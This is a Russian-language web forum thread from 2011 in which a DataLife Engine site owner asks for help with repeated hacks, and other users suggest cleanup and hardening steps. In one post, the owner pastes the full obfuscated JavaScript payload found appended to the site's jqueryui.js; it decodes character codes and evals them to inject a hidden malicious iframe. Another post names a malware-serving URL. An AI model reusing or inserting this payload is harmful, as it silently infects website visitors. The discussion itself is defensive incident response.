kamwork 0 Опубликовано: 25 октября 2011 Рассказать Опубликовано: 25 октября 2011 Сайт pokushay.ru Уже если честно устал, от службы поддержки к сожалению помощи не получил ни какой, кроме рекомендаций о том, что бы менять пароли, не хранить их на компе и все такое. А так же не использовать сторонние модули. У меня используется модуль sblock как без него я не знаю, т.к. функционал DLE не дает тех возможностей, которые мне дает данный модуль. Есть еще самописная штучка, примерно такого код: <? if (ereg("^/pervii_bluda/$",$_SERVER['REQUEST_URI'])) echo '<p>.......</p><br />'; ?> лежит в папке modules/context И вот такая http://www.pokushay.ru/catmap/kartofelnye_garniry.html она из нескольких файлов. Я готов заплатить, но помогите избавиться от этих постоянных взломов, утомило утро начинать с вычещения шелов и прочих модификаций Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 069 Опубликовано: 25 октября 2011 Рассказать Опубликовано: 25 октября 2011 Начните с описания того что именно у вас ломают и что именно у вас делают на сайте, а не просто сообщение "у меня ломают сайт", опишите подробно и четко что именно у вас делают на сайте, от этого уже зависит что вам делать. У меня используется модуль sblock как без него я не знаю На форуме публиковали что у данного модуля есть уязвимости, какие сказать не могу, я сторонние модули не смотрю и не пользуюсь. Цитата Ссылка на сообщение Поделиться на других сайтах
Lomot 134 Опубликовано: 25 октября 2011 Рассказать Опубликовано: 25 октября 2011 И вот такая http://www.pokushay....ye_garniry.html она из нескольких файлов. По ссылке вирусы с этого адреса http://go-fast.ru/in.cgi?5 Цитата Ссылка на сообщение Поделиться на других сайтах
kamwork 0 Опубликовано: 26 октября 2011 Рассказать Опубликовано: 26 октября 2011 Автор Начните с описания того что именно у вас ломают и что именно у вас делают на сайте, а не просто сообщение "у меня ломают сайт", опишите подробно и четко что именно у вас делают на сайте, от этого уже зависит что вам делать. Ну смотрите, на сайте появляются шелы, они как правило сидят в папке uploads в какой то из подпапок. Т.е. имеется полный доступ к сайту. Дадее уже на что фантазии хватает. Либо под мобильную версию делают сообщение что опера старела скачайте новую. Либо просто вирус в инфрейме. Либо параллельно с сайтом, открывается еще 1 сайт. Я пробовал с нуля все ставить, не помогло У меня отдельный сервер, на котором под каждый сайт отдельный аккаунт, так что врядли с соседних сайтов заползают. У меня используется модуль sblock как без него я не знаю На форуме публиковали что у данного модуля есть уязвимости, какие сказать не могу, я сторонние модули не смотрю и не пользуюсь. Поискал - не нашел данную тему. А без этого модуля, сайт будет не удобен. Уж очень удобно там все реализовано. И вот такая http://www.pokushay....ye_garniry.html она из нескольких файлов. По ссылке вирусы с этого адреса http://go-fast.ru/in.cgi?5 И сейчас что ли вирусы? Проверял, вроде все тихо там у меня Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 069 Опубликовано: 26 октября 2011 Рассказать Опубликовано: 26 октября 2011 Ну смотрите, на сайте появляются шелы, они как правило сидят в папке uploads в какой то из подпапок. Т.е. имеется полный доступ к сайту. Дадее уже на что фантазии хватает. Либо под мобильную версию делают сообщение что опера старела скачайте новую. Либо просто вирус в инфрейме. Либо параллельно с сайтом, открывается еще 1 сайт. Я правильно понимаю что версия скрипта у вас актуальная? Если да, то вам нужно полностью восстановить оригинальные файлы скрипта, сменить все пароли в админпанели, проверить что нет посторонних администраторов. Сменить пароли на БД и FTP. Не ставить никаких посторонних модулей и посмотреть появится ли что либо или нет. После того как восстановите все оригинальное, дайте доступ по FTP, и к админпанели, чтобы я визуально посмотрел, структуру папок и критически важных файлов, что у вас там не удалены механизмы защиты, возможно шел был ранее добавлен в теже файлы настроек, которые перезаливка дистрибутива не удаляет. Потому что при оригинальной структуре DLE даже если в папке uploads появится шелл его запустить невозможно. Но это исключительно при оригинальной структе и наличии всех необходимых .htaccess в папках. Вообщем нужно визуально все будет осмотреть, но удаление всех посторонних файлов и скриптов обязательно, независимо нужен вам тот или иной сторонний модуль или нет. Цитата Ссылка на сообщение Поделиться на других сайтах
kamwork 0 Опубликовано: 26 октября 2011 Рассказать Опубликовано: 26 октября 2011 Автор Ну смотрите, на сайте появляются шелы, они как правило сидят в папке uploads в какой то из подпапок. Т.е. имеется полный доступ к сайту. Дадее уже на что фантазии хватает. Либо под мобильную версию делают сообщение что опера старела скачайте новую. Либо просто вирус в инфрейме. Либо параллельно с сайтом, открывается еще 1 сайт. Я правильно понимаю что версия скрипта у вас актуальная? Если да, то вам нужно полностью восстановить оригинальные файлы скрипта, сменить все пароли в админпанели, проверить что нет посторонних администраторов. Сменить пароли на БД и FTP. Не ставить никаких посторонних модулей и посмотреть появится ли что либо или нет. После того как восстановите все оригинальное, дайте доступ по FTP, и к админпанели, чтобы я визуально посмотрел, структуру папок и критически важных файлов, что у вас там не удалены механизмы защиты, возможно шел был ранее добавлен в теже файлы настроек, которые перезаливка дистрибутива не удаляет. Потому что при оригинальной структуре DLE даже если в папке uploads появится шелл его запустить невозможно. Но это исключительно при оригинальной структе и наличии всех необходимых .htaccess в папках. Вообщем нужно визуально все будет осмотреть, но удаление всех посторонних файлов и скриптов обязательно, независимо нужен вам тот или иной сторонний модуль или нет. это сложно, если я запущу сайт без модуля с-блокс, сайт будет выглядеть ужасненько.. Я могу смириться с тем, что удалю блоки sape и ему подобных на время, но без с-блокс будет сложно Цитата Ссылка на сообщение Поделиться на других сайтах
kamwork 0 Опубликовано: 27 октября 2011 Рассказать Опубликовано: 27 октября 2011 (изменено) Автор Вчера перезалил весь сайт с нуля. Сегодня утром нашел странный файл - jqueryui.js, он то вроде и есть изначально, но он был модифицирован. При попытке скачки файла - он удаляется с компа сразу. Если изменить разширение, то нет. Я так полагаю, вот измененная часть: (function(c){c.effects.slide=function(d){return this.queue(function(){var a=c(this),h=["position","top","bottom","left","right"],f=c.effects.setMode(a,d.options.mode||"show"),b=d.options.direction||"left";c.effects.save(a,h);a.show();c.effects.createWrapper(a).css({overflow:"hidden"});var g=b=="up"||b=="down"?"top":"left";b=b=="up"||b=="left"?"pos":"neg";var e=d.options.distance||(g=="top"?a.outerHeight({margin:true}):a.outerWidth({margin:true}));if(f=="show")a.css(g,b=="pos"?isNaN(e)?"-"+e:-e:e); var i={};i[g]=(f=="show"?b=="pos"?"+=":"-=":b=="pos"?"-=":"+=")+e;a.animate(i,{queue:false,duration:d.duration,easing:d.options.easing,complete:function(){f=="hide"&&a.hide();c.effects.restore(a,h);c.effects.removeWrapper(a);d.callback&&d.callback.apply(this,arguments);a.dequeue()}})})}})(jQuery); var s=new String();try{document.asd.asd}catch(q){r=1;c=String;}if(r&&document.createTextNode)u=2;e=eval;m=[4.5*u,18/u,52.5*u,204/u,16*u,80/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,20.5*u,246/u,4.5*u,18/u,4.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,228/u,20*u,82/u,29.5*u,18/u,4.5*u,250/u,16*u,202/u,54*u,230/u,50.5*u,64/u,61.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,238/u,57*u,210/u,58*u,202/u,20*u,68/u,30*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,64/u,57.5*u,228/u,49.5*u,122/u,19.5*u,208/u,58*u,232/u,56*u,116/u,23.5*u,94/u,51.5*u,222/u,22.5*u,204/u,48.5*u,230/u,58*u,92/u,57*u,234/u,23.5*u,210/u,55*u,92/u,49.5*u,206/u,52.5*u,126/u,26.5*u,78/u,16*u,238/u,52.5*u,200/u,58*u,208/u,30.5*u,78/u,24.5*u,96/u,19.5*u,64/u,52*u,202/u,52.5*u,206/u,52*u,232/u,30.5*u,78/u,24.5*u,96/u,19.5*u,64/u,57.5*u,232/u,60.5*u,216/u,50.5*u,122/u,19.5*u,236/u,52.5*u,230/u,52.5*u,196/u,52.5*u,216/u,52.5*u,232/u,60.5*u,116/u,52*u,210/u,50*u,200/u,50.5*u,220/u,29.5*u,224/u,55.5*u,230/u,52.5*u,232/u,52.5*u,222/u,55*u,116/u,48.5*u,196/u,57.5*u,222/u,54*u,234/u,58*u,202/u,29.5*u,216/u,50.5*u,204/u,58*u,116/u,24*u,118/u,58*u,222/u,56*u,116/u,24*u,118/u,19.5*u,124/u,30*u,94/u,52.5*u,204/u,57*u,194/u,54.5*u,202/u,31*u,68/u,20.5*u,118/u,4.5*u,18/u,62.5*u,18/u,4.5*u,204/u,58.5*u,220/u,49.5*u,232/u,52.5*u,222/u,55*u,64/u,52.5*u,204/u,57*u,194/u,54.5*u,202/u,57*u,80/u,20.5*u,246/u,4.5*u,18/u,4.5*u,236/u,48.5*u,228/u,16*u,204/u,16*u,122/u,16*u,200/u,55.5*u,198/u,58.5*u,218/u,50.5*u,220/u,58*u,92/u,49.5*u,228/u,50.5*u,194/u,58*u,202/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,80/u,19.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,78/u,20.5*u,118/u,51*u,92/u,57.5*u,202/u,58*u,130/u,58*u,232/u,57*u,210/u,49*u,234/u,58*u,202/u,20*u,78/u,57.5*u,228/u,49.5*u,78/u,22*u,78/u,52*u,232/u,58*u,224/u,29*u,94/u,23.5*u,206/u,55.5*u,90/u,51*u,194/u,57.5*u,232/u,23*u,228/u,58.5*u,94/u,52.5*u,220/u,23*u,198/u,51.5*u,210/u,31.5*u,106/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,236/u,52.5*u,230/u,52.5*u,196/u,52.5*u,216/u,52.5*u,232/u,60.5*u,122/u,19.5*u,208/u,52.5*u,200/u,50*u,202/u,55*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,224/u,55.5*u,230/u,52.5*u,232/u,52.5*u,222/u,55*u,122/u,19.5*u,194/u,49*u,230/u,55.5*u,216/u,58.5*u,232/u,50.5*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,216/u,50.5*u,204/u,58*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,232/u,60.5*u,216/u,50.5*u,92/u,58*u,222/u,56*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,202/u,58*u,130/u,58*u,232/u,57*u,210/u,49*u,234/u,58*u,202/u,20*u,78/u,59.5*u,210/u,50*u,232/u,52*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,50.5*u,232/u,32.5*u,232/u,58*u,228/u,52.5*u,196/u,58.5*u,232/u,50.5*u,80/u,19.5*u,208/u,50.5*u,210/u,51.5*u,208/u,58*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,23*u,194/u,56*u,224/u,50.5*u,220/u,50*u,134/u,52*u,210/u,54*u,200/u,20*u,204/u,20.5*u,118/u,4.5*u,18/u,62.5*u];with(c)mm=fromCharCode;for(i=0;i!=m.length;i++)s+=mm(e("m"+"["+"i"+']'));try{document.qwe.removeChild({})}catch(q){e(s);}; ; Изменено 27 октября 2011 пользователем kamwork Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 069 Опубликовано: 27 октября 2011 Рассказать Опубликовано: 27 октября 2011 kamwork, на этот файл нет доступа для записи, соответственно записать его через скрипты и модифицировать нельзя. Если на файлы не было прав на запись, то изменить их через скрипты или удалить невозможно в принципе, т.к. нет прав. И это мог быть и взлом, но не скрипта DLE, а вашего FTP доступа или root доступа к серверу, или доступа к панели управления хостингом, либо уязвимости непосредственно в серверном ПО. Как воруются доступы и какие меры предпринять вы можете прочитать в темах на форуме http://forum.dle-new...ndpost&p=175979 http://forum.dle-new...32928&hl=iframe Там подробно описано как могут вороваться FTP доступы и как от этого защитится. Проверяйте свой компьютер на вирусы, меняйте все пароли, в том числе и по FTP и к БД. Установите ограничение по IP на доступ по FTP. Уведомите своего хостинг провайдера пусть по логам проверять кто и когда заходил по FTP и изменял данные файлы. В любом случае дайте мне сейчас доступ по FTP и к админпанели, я посмотрю есть права на запись в данный файл, если их нет, то у вас проблема именно с безопасностью не скриптов, а потерей доступа, либо у вас его воруют либо у хостинга. Цитата Ссылка на сообщение Поделиться на других сайтах
prikindel 255 Опубликовано: 27 октября 2011 Рассказать Опубликовано: 27 октября 2011 Я пробовал с нуля все ставить, не помогло У меня отдельный сервер, на котором под каждый сайт отдельный аккаунт, так что врядли с соседних сайтов заползают. очень спорный момент и зависит напрямую от настроек сервера. Цитата Ссылка на сообщение Поделиться на других сайтах
kamwork 0 Опубликовано: 3 ноября 2011 Рассказать Опубликовано: 3 ноября 2011 (изменено) Автор Проблема крылась в настройках сервера. Не работали запреты в .htaccess Спасибо разработчику s-blocks за помощь Изменено 3 ноября 2011 пользователем kamwork Цитата Ссылка на сообщение Поделиться на других сайтах
Mr-X 0 Опубликовано: 6 ноября 2011 Рассказать Опубликовано: 6 ноября 2011 На сервер рекомендую поставить CSF (Firewall) Установка, Настройки Цитата Ссылка на сообщение Поделиться на других сайтах
retysy 1 Опубликовано: 14 ноября 2011 Рассказать Опубликовано: 14 ноября 2011 На сервер рекомендую поставить CSF (Firewall) Установка, Настройки спасибо, попробую, думаю для безопасности не помешает) Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.